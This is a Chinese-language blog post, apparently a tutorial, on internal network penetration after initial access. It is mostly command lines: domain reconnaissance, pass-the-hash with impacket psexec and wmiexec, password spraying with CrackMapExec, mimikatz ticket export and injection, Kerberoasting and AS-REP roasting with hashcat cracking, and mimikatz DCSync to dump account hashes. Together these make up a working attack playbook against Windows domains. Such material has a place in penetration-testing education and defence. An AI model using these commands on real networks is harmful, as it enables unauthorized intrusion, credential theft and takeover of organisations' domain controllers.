上一篇文章聊了外网信息收集和漏洞挖掘,这篇接着讲拿到外网入口之后怎么做——内网渗透。
进入内网第一步,不是急着打域控,而是把当前机器的信息摸清楚。
# 网络信息 ipconfig /all route print arp -a # 系统信息 systeminfo whoami net user # 进程和服务 tasklist /svc wmic service list brief # 补丁信息 wmic qfe get Caption,Description,HotFixID,InstalledOn
重点关注:是否多网卡(意味着可以横向移动)、安装了哪些杀软、打了哪些补丁。
# 判断是否在域中 systeminfo | findstr /i "域" # 查看域信息 net view /domain nltest /dclist:域名 nltest /domain_trusts # 查找域控 nslookup -type=SRV _ldap._tcp.dc._msdcs.域名
拿到一台机器的权限后,目标是扩散到更多机器。
在内网中,很多管理员在多台机器上用同一个密码。如果拿到了LM/NTLM哈希,可以直接用哈希登录其他机器。
# 使用 impacket 的 psexec impacket-psexec 域名/用户名@目标IP -hashes LM哈希:NTLM哈希 # 使用 wmiexec impacket-wmiexec 域名/用户名@目标IP -hashes LM哈希:NTLM哈希
用常见密码对多个用户进行尝试登录,注意不要短时间内对同一个用户尝试太多次,容易触发锁定策略。
# 使用 CrackMapExec cme smb 192.168.1.0/24 -u users.txt -p passwords.txt --continue-on-success
利用Kerberos协议的特性进行横向移动。
# mimikatz 导出票据 mimikatz "privilege::debug" "sekurlsa::tickets /export" # 注入票据 mimikatz "kerberos::ptt 票据文件路径"
# 使用 Sherlock 或 Watson 扫描缺失的补丁 # 根据系统版本选择合适的EXP # Windows Exploit Suggester windows-exploit-suggester.py --database 2026-05-10-mssb.xls --systeminfo sysinfo.txt
# 检查 AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
请求域中某个服务的TGS票据,离线破解服务账户密码。
# 使用 impacket 的 GetUserSPNs impacket-GetUserSPNs -dc-ip 域控IP 域名/用户名:密码 -request # 用 hashcat 离线破解 hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
找到不需要Kerberos预认证的账户,直接请求TGT票据破解。
impacket-GetNPUsers -dc-ip 域控IP -no-pass 域名/用户名
如果拥有域管理员权限或相关权限,可以模拟域控请求账户哈希。
# 需要管理员权限 mimikatz "lsadump::dcsync /domain:域名 /user:目标用户名"
| 工具 | 用途 |
|---|---|
| mimikatz | 抓密码、票据操作 |
| impacket套件 | psexec, wmiexec, secretsdump |
| CrackMapExec | 内网批量探测 |
| BloodHound | 域信息可视化分析 |
| Nishang | PowerShell渗透框架 |
| Chisel / frp | 隧道搭建 |
内网渗透的核心是信息收集和横向移动。外网入口只是第一步,真正决定能不能打到域控的,是你在内网中的操作。多了解AD域的结构和Kerberos协议的原理,会对内网渗透有很大帮助。
本文作者:铁林 | 转载需注明出处
本文作者:寒江孤影
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!